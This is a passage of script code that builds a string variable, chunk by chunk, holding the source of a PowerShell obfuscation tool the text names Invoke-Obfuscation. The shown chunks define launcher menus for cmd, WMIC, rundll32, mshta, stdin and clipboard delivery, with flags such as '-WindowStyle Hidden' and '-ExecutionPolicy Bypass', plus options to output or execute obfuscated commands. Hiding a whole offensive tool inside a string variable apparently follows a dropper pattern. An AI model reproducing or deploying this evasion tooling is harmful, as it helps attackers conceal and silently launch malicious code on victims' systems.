Ouzw = Ouzw + "ellLauncher', '', '2'))
$MenuLevel_Launcher_CM"
Ouzw = Ouzw + "D += , @($LineSpacing, '2' , '-NonInteract"
Ouzw = Ouzw + "ive' ,"
Ouzw = Ouzw + " @('Out-PowerShellLauncher', '', '2'))
$MenuLe"
Ouzw = Ouzw + "vel_Launcher_CMD += , @($LineSpacing, '3' "
Ouzw = Ouzw + ", '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '2"
Ouzw = Ouzw + "'))
$MenuLevel_Launcher_CMD += , @($Li"
Ouzw = Ouzw + "neSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLa"
Ouzw = Ouzw + "uncher', '', '2'))
$MenuLevel_Launcher_CMD "
Ouzw = Ouzw + " += , @($LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('O"
Ouzw = Ouzw + "ut-PowerShellLauncher', '', '2'))
$MenuLevel_L"
Ouzw = Ouzw + "auncher_CMD += , @($LineSpacing, '6' , '-W"
Ouzw = Ouzw + "indowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '2'))
"
Ouzw = Ouzw + " $MenuLevel_Launcher_CMD += , @($LineSpa"
Ouzw = Ouzw + "cing, '7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunche"
Ouzw = Ouzw + "r', '', '2'))
$MenuLevel_Launcher_CMD "
Ouzw = Ouzw + "+= , @($LineSpacing, '8' , '-Wow64 (to path 32-bit"
Ouzw = Ouzw + " powershell.exe)' , @('Out-Po"
Ouzw = Ouzw + "werShellLauncher', '', '2'))
$MenuLevel_Launc"
Ouzw = Ouzw + "her_WMIC = @()
$MenuLevel_Launcher_W"
Ouzw = Ouzw + "MIC += , @("Enter string of numbers with al"
Ouzw = Ouzw + "l desired flags to pass to function. (e.g. 23459)`"
Ouzw = Ouzw + "n", '' , '' , @('', '', ''))
$MenuLevel_Lau"
Ouzw = Ouzw + "ncher_WMIC += , @($LineSpacing, '0' , 'NO E"
Ouzw = Ouzw + "XECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '3'))
"
Ouzw = Ouzw + " $MenuLevel_Launcher_WMIC += , @($LineSpaci"
Ouzw = Ouzw + "ng, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher'"
Ouzw = Ouzw + ", '', '3'))
$MenuLevel_Launcher_WMIC +="
Ouzw = Ouzw + " , @($LineSpacing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-Powe"
Ouzw = Ouzw + "rShellLauncher', '', '3'))
$MenuLevel_Launcher"
Ouzw = Ouzw + "_WMIC += , @($LineSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '3'))
$Men"
Ouzw = Ouzw + "uLevel_Launcher_WMIC += , @($LineSpacing, '"
Ouzw = Ouzw + "4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '',"
Ouzw = Ouzw + " '3'))
$MenuLevel_Launcher_WMIC += , @("
Ouzw = Ouzw + "$LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-PowerShel"
Ouzw = Ouzw + "lLauncher', '', '3'))
$MenuLevel_Launcher_WMIC"
Ouzw = Ouzw + " += , @($LineSpacing, '6' , '-WindowStyle H"
Ouzw = Ouzw + "idden' , @"
Ouzw = Ouzw + "('Out-PowerShellLauncher', '', '3'))
$MenuLeve"
Ouzw = Ouzw + "l_Launcher_WMIC += , @($LineSpacing, '7' , "
Ouzw = Ouzw + "'-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '3')"
Ouzw = Ouzw + ")
$MenuLevel_Launcher_WMIC += , @($Line"
Ouzw = Ouzw + "Spacing, '8' , '-Wow64 (to path 32-bit powershell."
Ouzw = Ouzw + "exe)' , @('Out-PowerShellLaun"
Ouzw = Ouzw + "cher', '', '3'))
$MenuLevel_Launcher_RUNDLL "
Ouzw = Ouzw + " = @()
$MenuLevel_Launcher_RUNDLL +"
Ouzw = Ouzw + "= , @("Enter string of numbers with all desired fl"
Ouzw = Ouzw + "ags to pass to function. (e.g. 23459)`n", '' , ''"
Ouzw = Ouzw + " , @('', '', ''))
$MenuLevel_Launcher_RUNDLL"
Ouzw = Ouzw + " += , @($LineSpacing, '0' , 'NO EXECUTION FLA"
Ouzw = Ouzw + "GS' , @('"
Ouzw = Ouzw + "Out-PowerShellLauncher', '', '4'))
$MenuLevel_"
Ouzw = Ouzw + "Launcher_RUNDLL += , @($LineSpacing, '1' , '-"
Ouzw = Ouzw + "NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '4'))
"
Ouzw = Ouzw + " $MenuLevel_Launcher_RUNDLL += , @($LineSp"
Ouzw = Ouzw + "acing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunch"
Ouzw = Ouzw + "er', '', '4'))
$MenuLevel_Launcher_RUNDLL "
Ouzw = Ouzw + " += , @($LineSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-P"
Ouzw = Ouzw + "owerShellLauncher', '', '4'))
$MenuLevel_Launc"
Ouzw = Ouzw + "her_RUNDLL += , @($LineSpacing, '4' , '-NoPro"
Ouzw = Ouzw + "file' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '4'))
$"
Ouzw = Ouzw + "MenuLevel_Launcher_RUNDLL += , @($LineSpacing"
Ouzw = Ouzw + ", '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', "
Ouzw = Ouzw + "'', '4'))
$MenuLevel_Launcher_RUNDLL += ,"
Ouzw = Ouzw + " @($LineSpacing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerS"
Ouzw = Ouzw + "hellLauncher', '', '4'))
$MenuLevel_Launcher_R"
Ouzw = Ouzw + "UNDLL += , @($LineSpacing, '7' , '-ExecutionP"
Ouzw = Ouzw + "olicy Bypass' "
Ouzw = Ouzw + ", @('Out-PowerShellLauncher', '', '4'))
$MenuL"
Ouzw = Ouzw + "evel_Launcher_RUNDLL += , @($LineSpacing, '8'"
Ouzw = Ouzw + " , '-Wow64 (to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '"
Ouzw = Ouzw + "4'))
${MenuLevel_Launcher_VAR+} = @()"
Ouzw = Ouzw + "
${MenuLevel_Launcher_VAR+} += , @("Enter"
Ouzw = Ouzw + " string of numbers with all desired flags to pass "
Ouzw = Ouzw + "to function. (e.g. 23459)`n", '' , '' , @('', '"
Ouzw = Ouzw + "', ''))
${MenuLevel_Launcher_VAR+} += , @"
Ouzw = Ouzw + "($LineSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShe"
Ouzw = Ouzw + "llLauncher', '', '5'))
${MenuLevel_Launcher_VA"
Ouzw = Ouzw + "R+} += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , "
Ouzw = Ouzw + "@('Out-PowerShellLauncher', '', '5'))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_VAR+} += , @($LineSpacing, '2' ,"
Ouzw = Ouzw + " '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '5'"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_VAR+} += , @($Lin"
Ouzw = Ouzw + "eSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLau"
Ouzw = Ouzw + "ncher', '', '5'))
${MenuLevel_Launcher_VAR+} "
Ouzw = Ouzw + " += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '5'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_VAR+} += , @($LineSpacing, '5' , '-Co"
Ouzw = Ouzw + "mmand' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '5'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_VAR+} += , @($LineSpac"
Ouzw = Ouzw + "ing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '5'))
${MenuLevel_Launcher_VAR+} +"
Ouzw = Ouzw + "= , @($LineSpacing, '7' , '-ExecutionPolicy Bypass"
Ouzw = Ouzw + "' , @('Out-Pow"
Ouzw = Ouzw + "erShellLauncher', '', '5'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_VAR+} += , @($LineSpacing, '8' , '-Wow64 ("
Ouzw = Ouzw + "to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '5'))
${"
Ouzw = Ouzw + "MenuLevel_Launcher_STDIN+} = @()
${MenuL"
Ouzw = Ouzw + "evel_Launcher_STDIN+} += , @("Enter string of n"
Ouzw = Ouzw + "umbers with all desired flags to pass to function."
Ouzw = Ouzw + " (e.g. 23459)`n", '' , '' , @('', '', ''))
"
Ouzw = Ouzw + "${MenuLevel_Launcher_STDIN+} += , @($LineSpacin"
Ouzw = Ouzw + "g, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher',"
Ouzw = Ouzw + " '', '6'))
${MenuLevel_Launcher_STDIN+} += "
Ouzw = Ouzw + ", @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-Power"
Ouzw = Ouzw + "ShellLauncher', '', '6'))
${MenuLevel_Launcher"
Ouzw = Ouzw + "_STDIN+} += , @($LineSpacing, '2' , '-NonIntera"
Ouzw = Ouzw + "ctive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '6'))
${Men"
Ouzw = Ouzw + "uLevel_Launcher_STDIN+} += , @($LineSpacing, '3"
Ouzw = Ouzw + "' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', "
Ouzw = Ouzw + "'6'))
${MenuLevel_Launcher_STDIN+} += , @($"
Ouzw = Ouzw + "LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShell"
Ouzw = Ouzw + "Launcher', '', '6'))
${MenuLevel_Launcher_STDI"
Ouzw = Ouzw + "N+} += , @($LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @("
Ouzw = Ouzw + "'Out-PowerShellLauncher', '', '6'))
${MenuLeve"
Ouzw = Ouzw + "l_Launcher_STDIN+} += , @($LineSpacing, '6' , '"
Ouzw = Ouzw + "-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '6'))"
Ouzw = Ouzw + "
${MenuLevel_Launcher_STDIN+} += , @($LineS"
Ouzw = Ouzw + "pacing, '7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunc"
Ouzw = Ouzw + "her', '', '6'))
${MenuLevel_Launcher_STDIN+} "
Ouzw = Ouzw + " += , @($LineSpacing, '8' , '-Wow64 (to path 32-b"
Ouzw = Ouzw + "it powershell.exe)' , @('Out-"
Ouzw = Ouzw + "PowerShellLauncher', '', '6'))
${MenuLeve"
Ouzw = Ouzw + "l_Launcher_CLIP+} = @()
${MenuLevel_Lau"
Ouzw = Ouzw + "ncher_CLIP+} += , @("Enter string of numbers w"
Ouzw = Ouzw + "ith all desired flags to pass to function. (e.g. 2"
Ouzw = Ouzw + "3459)`n", '' , '' , @('', '', ''))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_CLIP+} += , @($LineSpacing, '0' ,"
Ouzw = Ouzw + " 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '7'"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_CLIP+} += , @($Lin"
Ouzw = Ouzw + "eSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLau"
Ouzw = Ouzw + "ncher', '', '7'))
${MenuLevel_Launcher_CLIP+} "
Ouzw = Ouzw + " += , @($LineSpacing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '7'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_CLIP+} += , @($LineSpacing, '3' , '-No"
Ouzw = Ouzw + "Logo' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '7'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_CLIP+} += , @($LineSpac"
Ouzw = Ouzw + "ing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '7'))
${MenuLevel_Launcher_CLIP+} +"
Ouzw = Ouzw + "= , @($LineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-Pow"
Ouzw = Ouzw + "erShellLauncher', '', '7'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_CLIP+} += , @($LineSpacing, '6' , '-WindowS"
Ouzw = Ouzw + "tyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '7'))
${M"
Ouzw = Ouzw + "enuLevel_Launcher_CLIP+} += , @($LineSpacing, "
Ouzw = Ouzw + "'7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', ''"
Ouzw = Ouzw + ", '7'))
${MenuLevel_Launcher_CLIP+} += , @"
Ouzw = Ouzw + "($LineSpacing, '8' , '-Wow64 (to path 32-bit power"
Ouzw = Ouzw + "shell.exe)' , @('Out-PowerShe"
Ouzw = Ouzw + "llLauncher', '', '7'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_VAR++} = @()
${MenuLevel_Launcher_VA"
Ouzw = Ouzw + "R++} += , @("Enter string of numbers with all "
Ouzw = Ouzw + "desired flags to pass to function. (e.g. 23459)`n""
Ouzw = Ouzw + ", '' , '' , @('', '', ''))
${MenuLevel_Laun"
Ouzw = Ouzw + "cher_VAR++} += , @($LineSpacing, '0' , 'NO EXE"
Ouzw = Ouzw + "CUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '8'))
$"
Ouzw = Ouzw + "{MenuLevel_Launcher_VAR++} += , @($LineSpacing"
Ouzw = Ouzw + ", '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', "
Ouzw = Ouzw + "'', '8'))
${MenuLevel_Launcher_VAR++} += ,"
Ouzw = Ouzw + " @($LineSpacing, '2' , '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerS"
Ouzw = Ouzw + "hellLauncher', '', '8'))
${MenuLevel_Launcher_"
Ouzw = Ouzw + "VAR++} += , @($LineSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " "
Ouzw = Ouzw + ", @('Out-PowerShellLauncher', '', '8'))
${Menu"
Ouzw = Ouzw + "Level_Launcher_VAR++} += , @($LineSpacing, '4'"
Ouzw = Ouzw + " , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '"
Ouzw = Ouzw + "8'))
${MenuLevel_Launcher_VAR++} += , @($L"
Ouzw = Ouzw + "ineSpacing, '5' , '-Command' "
Ouzw = Ouzw + " , @('Out-PowerShellL"
Ouzw = Ouzw + "auncher', '', '8'))
${MenuLevel_Launcher_VAR++"
Ouzw = Ouzw + "} += , @($LineSpacing, '6' , '-WindowStyle Hid"
Ouzw = Ouzw + "den' , @('"
Ouzw = Ouzw + "Out-PowerShellLauncher', '', '8'))
${MenuLevel"
Ouzw = Ouzw + "_Launcher_VAR++} += , @($LineSpacing, '7' , '-"
Ouzw = Ouzw + "ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '8'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_VAR++} += , @($LineSp"
Ouzw = Ouzw + "acing, '8' , '-Wow64 (to path 32-bit powershell.ex"
Ouzw = Ouzw + "e)' , @('Out-PowerShellLaunch"
Ouzw = Ouzw + "er', '', '8'))
${MenuLevel_Launcher_STDIN++} "
Ouzw = Ouzw + " = @()
${MenuLevel_Launcher_STDIN++} += "
Ouzw = Ouzw + ", @("Enter string of numbers with all desired flag"
Ouzw = Ouzw + "s to pass to function. (e.g. 23459)`n", '' , '' "
Ouzw = Ouzw + " , @('', '', ''))
${MenuLevel_Launcher_STDIN++"
Ouzw = Ouzw + "} += , @($LineSpacing, '0' , "`tNO EXECUTION FLA"
Ouzw = Ouzw + "GS" , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '9'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_STDIN++} += , @($LineSpacing, '1' , "`t-"
Ouzw = Ouzw + "NoExit" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '9'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_STDIN++} += , @($LineSpac"
Ouzw = Ouzw + "ing, '2' , "`t-NonInteractive" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '9'))
${MenuLevel_Launcher_STDIN++} +"
Ouzw = Ouzw + "= , @($LineSpacing, '3' , "`t-NoLogo" "
Ouzw = Ouzw + " , @('Out-Pow"
Ouzw = Ouzw + "erShellLauncher', '', '9'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_STDIN++} += , @($LineSpacing, '4' , "`t-NoPro"
Ouzw = Ouzw + "file" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '9'))
${M"
Ouzw = Ouzw + "enuLevel_Launcher_STDIN++} += , @($LineSpacing, "
Ouzw = Ouzw + "'5' , "`t-Command" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', ''"
Ouzw = Ouzw + ", '9'))
${MenuLevel_Launcher_STDIN++} += , @"
Ouzw = Ouzw + "($LineSpacing, '6' , "`t-WindowStyle Hidden" "
Ouzw = Ouzw + " , @('Out-PowerShe"
Ouzw = Ouzw + "llLauncher', '', '9'))
${MenuLevel_Launcher_ST"
Ouzw = Ouzw + "DIN++} += , @($LineSpacing, '7' , "`t-ExecutionP"
Ouzw = Ouzw + "olicy Bypass" , "
Ouzw = Ouzw + "@('Out-PowerShellLauncher', '', '9'))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_STDIN++} += , @($LineSpacing, '8' ,"
Ouzw = Ouzw + " "`t-Wow64 (to path 32-bit powershell.exe)" "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '9'"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_CLIP++} = @()
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_CLIP++} += , @("Enter s"
Ouzw = Ouzw + "tring of numbers with all desired flags to pass to"
Ouzw = Ouzw + " function. (e.g. 23459)`n", '' , '' , @('', '',"
Ouzw = Ouzw + " ''))
${MenuLevel_Launcher_CLIP++} += , @($"
Ouzw = Ouzw + "LineSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShell"
Ouzw = Ouzw + "Launcher', '', '10'))
${MenuLevel_Launcher_CLI"
Ouzw = Ouzw + "P++} += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @"
Ouzw = Ouzw + "('Out-PowerShellLauncher', '', '10'))
${MenuLe"
Ouzw = Ouzw + "vel_Launcher_CLIP++} += , @($LineSpacing, '2' ,"
Ouzw = Ouzw + " '-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '10"
Ouzw = Ouzw + "'))
${MenuLevel_Launcher_CLIP++} += , @($Li"
Ouzw = Ouzw + "neSpacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLa"
Ouzw = Ouzw + "uncher', '', '10'))
${MenuLevel_Launcher_CLIP+"
Ouzw = Ouzw + "+} += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('"
Ouzw = Ouzw + "Out-PowerShellLauncher', '', '10'))
${MenuLeve"
Ouzw = Ouzw + "l_Launcher_CLIP++} += , @($LineSpacing, '5' , '"
Ouzw = Ouzw + "-Command' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '10')"
Ouzw = Ouzw + ")
${MenuLevel_Launcher_CLIP++} += , @($Line"
Ouzw = Ouzw + "Spacing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLaun"
Ouzw = Ouzw + "cher', '', '10'))
${MenuLevel_Launcher_CLIP++}"
Ouzw = Ouzw + " += , @($LineSpacing, '7' , '-ExecutionPolicy B"
Ouzw = Ouzw + "ypass' , @('Ou"
Ouzw = Ouzw + "t-PowerShellLauncher', '', '10'))
${MenuLevel_"
Ouzw = Ouzw + "Launcher_CLIP++} += , @($LineSpacing, '8' , '-W"
Ouzw = Ouzw + "ow64 (to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '10'))
"
Ouzw = Ouzw + "
${MenuLevel_Launcher_RUNDLL++} = @()
"
Ouzw = Ouzw + "${MenuLevel_Launcher_RUNDLL++} += , @("Enter stri"
Ouzw = Ouzw + "ng of numbers with all desired flags to pass to fu"
Ouzw = Ouzw + "nction. (e.g. 23459)`n", '' , '' , @('', '', ''"
Ouzw = Ouzw + "))
${MenuLevel_Launcher_RUNDLL++} += , @($Lin"
Ouzw = Ouzw + "eSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLau"
Ouzw = Ouzw + "ncher', '', '11'))
${MenuLevel_Launcher_RUNDLL"
Ouzw = Ouzw + "++} += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('O"
Ouzw = Ouzw + "ut-PowerShellLauncher', '', '11'))
${MenuLevel"
Ouzw = Ouzw + "_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-"
Ouzw = Ouzw + "NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '11'))"
Ouzw = Ouzw + "
${MenuLevel_Launcher_RUNDLL++} += , @($LineS"
Ouzw = Ouzw + "pacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunc"
Ouzw = Ouzw + "her', '', '11'))
${MenuLevel_Launcher_RUNDLL++"
Ouzw = Ouzw + "} += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out"
Ouzw = Ouzw + "-PowerShellLauncher', '', '11'))
${MenuLevel_L"
Ouzw = Ouzw + "auncher_RUNDLL++} += , @($LineSpacing, '5' , '-Co"
Ouzw = Ouzw + "mmand' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '11'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpa"
Ouzw = Ouzw + "cing, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunche"
Ouzw = Ouzw + "r', '', '11'))
${MenuLevel_Launcher_RUNDLL++} "
Ouzw = Ouzw + " += , @($LineSpacing, '7' , '-ExecutionPolicy Bypa"
Ouzw = Ouzw + "ss' , @('Out-P"
Ouzw = Ouzw + "owerShellLauncher', '', '11'))
${MenuLevel_Lau"
Ouzw = Ouzw + "ncher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow6"
Ouzw = Ouzw + "4 (to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '11'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_MSHTA++} = @()
${M"
Ouzw = Ouzw + "enuLevel_Launcher_MSHTA++} += , @("Enter string "
Ouzw = Ouzw + "of numbers with all desired flags to pass to funct"
Ouzw = Ouzw + "ion. (e.g. 23459)`n", '' , '' , @('', '', ''))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_MSHTA++} += , @($LineSp"
Ouzw = Ouzw + "acing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunch"
Ouzw = Ouzw + "er', '', '12'))
${MenuLevel_Launcher_MSHTA++} "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-"
Ouzw = Ouzw + "PowerShellLauncher', '', '12'))
${MenuLevel_La"
Ouzw = Ouzw + "uncher_MSHTA++} += , @($LineSpacing, '2' , '-Non"
Ouzw = Ouzw + "Interactive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '12'))
"
Ouzw = Ouzw + " ${MenuLevel_Launcher_MSHTA++} += , @($LineSpac"
Ouzw = Ouzw + "ing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher"
Ouzw = Ouzw + "', '', '12'))
${MenuLevel_Launcher_MSHTA++} "
Ouzw = Ouzw + "+= , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-Po"
Ouzw = Ouzw + "werShellLauncher', '', '12'))
${MenuLevel_Laun"
Ouzw = Ouzw + "cher_MSHTA++} += , @($LineSpacing, '5' , '-Comma"
Ouzw = Ouzw + "nd' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '12'))
"
Ouzw = Ouzw + "${MenuLevel_Launcher_MSHTA++} += , @($LineSpacin"
Ouzw = Ouzw + "g, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher',"
Ouzw = Ouzw + " '', '12'))
${MenuLevel_Launcher_MSHTA++} +="
Ouzw = Ouzw + " , @($LineSpacing, '7' , '-ExecutionPolicy Bypass'"
Ouzw = Ouzw + " , @('Out-Powe"
Ouzw = Ouzw + "rShellLauncher', '', '12'))
${MenuLevel_Launch"
Ouzw = Ouzw + "er_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 ("
Ouzw = Ouzw + "to path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '12'))
#"
Ouzw = Ouzw + " Input options to display non-interactive menus or"
Ouzw = Ouzw + " perform actions.
$TutorialInputOptions "
Ouzw = Ouzw + " = @(@('tutorial') , ""
Ouzw = Ouzw + "<Tutorial> of how to use this tool `t " )
"
Ouzw = Ouzw + " $MenuInputOptionsShowHelp = @(@('help','ge"
Ouzw = Ouzw + "t-help','?','-?','/?','menu'), "Show this <Help> M"
Ouzw = Ouzw + "enu `t " )
$MenuInputOpti"
Ouzw = Ouzw + "onsShowOptions = @(@('show options','show','optio"
Ouzw = Ouzw + "ns') , "<Show options> for payload to obfusc"
Ouzw = Ouzw + "ate `t " )
$ClearScreenInputOptions = "
Ouzw = Ouzw + "@(@('clear','clear-host','cls') , "<Cle"
Ouzw = Ouzw + "ar> screen `t " )
"
Ouzw = Ouzw + "$CopyToClipboardInputOptions = @(@('copy','clip',"
Ouzw = Ouzw + "'clipboard') , "<Copy> ObfuscatedComma"
Ouzw = Ouzw + "nd to clipboard `t " )
$OutputToDiskInput"
Ouzw = Ouzw + "Options = @(@('out') "
Ouzw = Ouzw + " , "Write ObfuscatedCommand <Out> to disk "
Ouzw = Ouzw + " `t " )
$ExecutionInputOptions = @(@("
Ouzw = Ouzw + "'exec','execute','test','run') , "<Execute"
Ouzw = Ouzw + "> ObfuscatedCommand locally `t " )
$Res"
Ouzw = Ouzw + "etObfuscationInputOptions = @(@('reset') "
Ouzw = Ouzw + " , "<Reset> ALL obfuscation fo"
Ouzw = Ouzw + "r ObfuscatedCommand ")
$UndoObfuscationInputO"
Ouzw = Ouzw + "ptions = @(@('undo') "
Ouzw = Ouzw + " , "<Undo> LAST obfuscation for ObfuscatedComman"
Ouzw = Ouzw + "d ")
$BackCommandInputOptions = @(@('bac"
Ouzw = Ouzw + "k','cd ..') , "Go <Back> to"
Ouzw = Ouzw + " previous obfuscation menu `t " )
$ExitCom"
Ouzw = Ouzw + "mandInputOptions = @(@('quit','exit') "
Ouzw = Ouzw + " , "<Quit> Invoke-Obfuscation "
Ouzw = Ouzw + " `t " )
$HomeMenuInputOptions "
Ouzw = Ouzw + " = @(@('home','main') ,"
Ouzw = Ouzw + " "Return to <Home> Menu `t " "
Ouzw = Ouzw + ")
# For Version 1.0 ASCII art is not necessary"
Ouzw = Ouzw + ".
#$ShowAsciiArtInputOptions = @(@('ascii'"
Ouzw = Ouzw + ") , "Display random "
Ouzw = Ouzw + "<ASCII> art for the lulz :)`t")
# Add all"
Ouzw = Ouzw + " above input options lists to be displayed in SHOW"
Ouzw = Ouzw + " OPTIONS menu.
$AllAvailableInputOptionsLists "
Ouzw = Ouzw + " = @()
$AllAvailableInputOptionsLists += , $"
Ouzw = Ouzw + "TutorialInputOptions
$AllAvailableInputOptions"
Ouzw = Ouzw + "Lists += , $MenuInputOptionsShowHelp
$AllAvai"
Ouzw = Ouzw + "lableInputOptionsLists += , $MenuInputOptionsShow"
Ouzw = Ouzw + "Options
$AllAvailableInputOptionsLists += , $"
Ouzw = Ouzw + "ClearScreenInputOptions
$AllAvailableInputOpti"
Ouzw = Ouzw + "onsLists += , $ExecutionInputOptions
$AllAvai"
Ouzw = Ouzw + "lableInputOptionsLists += , $CopyToClipboardInput"
Ouzw = Ouzw + "Options
$AllAvailableInputOptionsLists += , $"
Ouzw = Ouzw + "OutputToDiskInputOptions
$AllAvailableInputOpt"
Ouzw = Ouzw + "ionsLists += , $ResetObfuscationInputOptions
"
Ouzw = Ouzw + "$AllAvailableInputOptionsLists += , $UndoObfuscat"
Ouzw = Ouzw + "ionInputOptions
$AllAvailableInputOptionsLists"
Ouzw = Ouzw + " += , $BackCommandInputOptions
$AllAvaila"
